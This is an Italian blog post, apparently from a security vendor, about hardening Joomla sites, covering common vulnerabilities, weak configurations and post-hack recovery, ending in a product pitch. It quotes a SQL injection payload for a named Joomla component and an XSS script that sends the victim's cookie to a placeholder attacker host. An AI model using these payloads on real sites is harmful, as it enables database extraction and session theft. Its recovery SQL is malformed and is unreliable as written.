Joomla Cyber Security: La tutela del proprio sito web è un elemento indispensabile per proteggere il proprio business. La sicurezza informatica è una sfida continua che costringe tutti i professionisti del settore ad una analisi costante allo scopo di identificare le nuove minacce, le nuove vulnerabilità e i possibili impatti al fine di determinare le soluzioni di cybersecurity opportune. Abbiamo già illustrato le modalità relative al mondo siti web wordpress cybersecurity e non potevamo non approdonire i temi legati al secondo CMS più usato. Stiamo parlando del Joomla Cyber Security Framework.
Nei prossimi paragrafi affronteremo i seguenti aspetti:
- Joomla Cyber Security: Perchè?
- Le Top 6 Joomla Cyber Security Vulnerability;
- Top 10 Joomla Cyber Security: Criticità;
- Ripristinare il Joomla Cyber Security Framework;
- Strumenti per la Sicurezza dei siti Joomla.
[check-website-link-home]
Joomla Cyber Security: Perchè?
Joomla è il secondo CMS più scaricato al mondo. Stiamo parlando di circa 68 milioni di installazioni e allo stesso tempo è uno dei CMS più attaccati. In uno studio del 2016 è stato rilevato che i siti infettati/hackerati erano per il 78% CMS wordpress e per il 14% erano siti web Joomla.
La maggior parte dei siti Web è in realtà compromesso a causa di una errata configurazione, di hosting non adeguati, codice vulnerabile, fix non applicati e upgrade non effettuati. Nei prossimi paragrafi affronteremo il tema relativo al Joomla Cyber Security Framework che ogni Web Master dovrebbe implementare indicando le minacce, le vulnerabilità e le soluzioni per avere un sito web Joomla sicuro.
[check-website-link-home]
Le Top 6 Joomla Cyber Security Vulnerability
1) SQL Injection
Sql Injection è una delle principali vulnerabilità di Joomla. L’ultima criticità risale a quest’anno e si riferisce al CVE-2018-8045. In realtà, sono stati identificati diversi componenti vulnerabili al SQL Injection, per comodità ci concentreremo su jimtawl di Joomla. La vulnerabilità è relativa a paramemtro id‘:
http://localhost/[PATH]/index.php?option=com_jimtawl&view=user&task=user.edit&id=[SQL]
La stringa di codice successiva potrebbe permettere ad un Criminal Hacker di ottenere le informazioni relative all’utente e alla versione del database del server.
' AND EXTRACTVALUE(66,CONCAT(0x5c,(SELECT (ELT(66=66,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())))-- VerAyari
L’exploit di questa vulnerabilità è pubblico, quindi facilmente sfruttabile da chiunque.
2) XSS: Cross Site Scripting
Il Joomla Cyber Security framework è spesso oggetto di attacchi di Cross Site Scripting . Un attacco di Cross Site Scripting è molto simile al SQL Injection. Tuttavia, la differenza è che XSS utilizza Javascript. L’ultimo è il CVE-2018-12711 e impatta sul ” modulo della lingua “.
<script>
window.location='http://attacker/cookie='+document.cookie
</script>
Ad esempio, il comando codice indicato permette ad un terzo malintenzionato di rubare il cookie utente per attività di phishing.
3) Javascript Injection
Il javascript injection è una delle criticità tipiche e una seria minaccia per il Joomla Cyber Security Framework. E’ possibile verificare se un sito Joomla è vulnerabile al Javascript injection attraverso un semplice test direttamente nella barra degli indirizzi:
javascript:alert(‘Executed!’);
Se compare il messaggio ” Executed “, allora il sito Joomla è vulnerabile. Questi attacchi permettono ad una terza parte di:
- replicare il cookie utente;
- effettuare un web defacement:
- effettuare una spam injection;
- reindirizzare il sito.
Un Javascript injection sfrutta l’assenza di convalida degli input. E’ sempre opportuno effettuare un vulnerability scan del sito per verificare la presenza di eventuali criticità.
4) Phishing
Gli attacchi di phishing sono sempre più diffusi e utilizzati per effettuare l’hacking di un sito web Joomla. E’ necessario prestare massima attenzione. Per comprendere se i tuoi fornitori o dipendenti sanno riconoscere le mail di phishing è consigliato attivare servizi di phishing simulation attack
5) Hack SEO
Per verificare se il tuo Joomla Cyber Security Framework è stato oggetto di Hack SEO è sufficiente digitare su Google inurl: "viagra" "powered by Joomla".
In questo caso potrai controllare se il sito Joomla è oggetto di spammer legato al mondo viagra.
Le ragioni potrebbero essere legate ad un attacco di Injection o modifica del sito. Le conseguenza rimangono però devastanti.
6) Errori di configurazione del server
Spesso la criticità che mette a rischio il Joomla Cyber Security è legata ad un errore nella configurazione del server. La mancanza di adeguati permessi di accesso, l’utilizzo di impostazioni by default o il file .htacess
con permessi di scrittura possono essere la causa di un hack del sito. Le principali cause sono:
- Credenziali deboli o di default;
- Porte aperte non necessarie;
- Sottodomini abbandonati o dimenticati;
- Installazioni non aggiornate e/o obsolete;
- DNS non protetto;
- Più siti web che condividono lo stesso hosting senza subnetting.
E’ opportuno effettuare periodicamente attività di network scan e network assessment per verificare la presenza di eventuali errori di configurazione.
[check-website-link-home]
Top 10 Joomla Cyber Security Criticità
Le vulnerabilità che possono impattare sul Joomla Cyber Security framework sono spesso relative ad alcuni errori e disattenzioni che possono mettere a rischio la business continuity della tua azienda. Di seguito elenchiamo le Top 10 Cyber Security Criticità:
n°1. Hosting non adeguato:
Gli hosting provider a basso costo possono garantire un vantaggio economico ma non sempre un livello di sicurezza adeguato per il sito web Joomla. Spesso i fornitori di hosting economici utilizzano server condivisi e il joomla cyber security framework del tuo sito potrebbe essere messo a rischio. Accanto a possibili problemi di performance, di reputazione (potrebbe avere un “cattivo vicinato”) anche possibili data breach indiretti se uno degli altri siti venisse compromesso, insomma, accanto a questi aspetti prettamente operativi è bene anche valutare i livelli di servizio, servizi aggiuntivi unitamente al supporto tecnico in caso di necessità.
n°2 Assenza di backup
Assicurarsi di effettuare ed avere a disposizione il backup del sito Joomla. Questo è uno degli aspetti essenziali per un corretto Joomla Cyber Security Framework.
n°3 Errata configurazione di PhP
Gli errori di configurazione e impostazioni di PHP del sito Joomla sono una opportunità per i Criminal Hacker.
n°4 Password deboli o di default
Utilizzando password deboli e/o mantenendo gli account e password di default qualsiasi misura del sito Joomla viene meno e perde ogni valore e significato il Joomla Cyber Security framework implementato.
n°5 Sito non monitorato
Installare e non effettuare il monitoring continuo e costante del proprio sito web è una delle cause della compromissione dei siti Joomla e non solo.
n°6 Nessun sito clone di sviluppo
Non avere un sito clone che permetta di testare e controllare gli eventuali impatti relativi a estensioni, upgrade e fixing è un grave problema di Joomla Security.
n°7 Plugin di terze parti compromessi
E’ una delle criticità più diffuse ed è riferito al supply chain cyber security framework, Non tutte le estensioni di terze parti sono esenti da problemi e vulnerabilità. E’ sempre opportuno, non solo effettuare attività di vulnerability assessment e network scan, ma anche verificare il tutto sul sito clone di sviluppo.
n°8 Nessun aggiornamento del sito Joomla
Non mantenere aggiornato il proprio sito Joomla significa avere la quasi certezza di subire un attacco informatico. Questo aspetto vale anche per gli eventuali plugin o software di terze parti utilizzati/integrati.
n°9 Assenza di informazioni
Non avere costantemente aggiornate le informazioni relativamente all’infrastruttura, alla versione del sito Joomla in uso unitamente a quelle dei plugin o software terzi rappresenta un grave problema poichè in caso di compromissione del sito, diventa estremamente difficoltoso comprendere le cause/vettore/punto di ingresso dell’attacco informatico.
n°10 Assenza di audit tecnologico
Non effettuare attività periodiche di Vulnerability Assessment e Network Scan del proprio sito web rappresenta una criticità poichè non si dispone dell’Analisi del Rischio Tecnologico che è una attività obbligatoria per la nuova legge sulla Privacy GDPR ma anche una attività necessaria per comprendere le eventuali criticità e adottare le misure adeguate di protezione.
[check-website-link-home]
Ripristinare il Joomla Cyber Security Framework
Di seguito elenchiamo le attività che devono essere condotte in caso di Hacking per il ripristino del Joomla Cyber Secuirty Framework e della business continuity.
1) Database
Se il Joomla Cyber Security Framework è stato compromesso, la prima attività da fare è identificare eventuali nuovi utenti creati nel database. Utilizza questo comando:
Select * from users as u
AND u.created > UNIX_TIMESTAMP(STR_TO_DATE('My_Date', '%M %d %Y '));
Identificare eventuali utenti non autorizzati ed eliminari. attraberso il comando SQL: Drop User;
2) Server
Verifica e controlla la componente Server. Alcuni punti chiave:
- Porte aperte;
- Sottodomini non necessari e non utilizzati;
- Configurazione;
- Check delle password e account FTP e account di default;
- E’ opportuno prevedere un WAF o un firewall;
- Attività di Network Scan.
3) Permessi
- Verifica i permessi relativi agli eseguibili come
.php
.aspx
ecc… - Verifica i permessi dei file. Controlla prima di tutto i permessi relativi al .htaccess;
- Controlla che i file PHP non possano essere sovrascritti;
- Usa plugin ed estensioni conosciute e affidabili.
4) Modifiche
Tramite il backup verifica la presenza di eventuali file modificati.
5) Registro utenti
L’analisi dei log è sicuramente il metodo migliore. Per verificare la presenza di eventuali utenti sospetti:
- Accedi a Joomla Dashboard;
- Clicca su Utenti e seleziona Gestisci;
- Controlla gli ultimi utenti registrati e i loro permessi;
- Verifica la la data dell’ultima visita.
6) Aggiornamenti
La maggior parte delle volte, le cause che compromettono il Joomla Cyber Security Framework comprendono la presenza di file non patchati o plugin non aggiornati. Assicurati sempre di aggiornare costantemente tutte le componenti del sito Joomla.
Strumenti per la sicurezza dei siti Joomla
Swascan ha ideato uno specifico Joomla Cyber security Framework per garantire la sicurezza dei siti Joomla. Un framework strutturato in competenze di Cyber Security e strumenti tecnologici.
Un team di professionisti esperti di Joomla Security che garantiranno la definizione dei requisiti di sicurezza informatica, le procedure, le attività di monitoring e auditing.
La piattaforma di Cybersecurity Swascan che permetterà di rilevare, analizzare e risolvere le vulnerabilità e criticità di sicurezza attraverso i servizi di:
Inizia il tuo Free Trial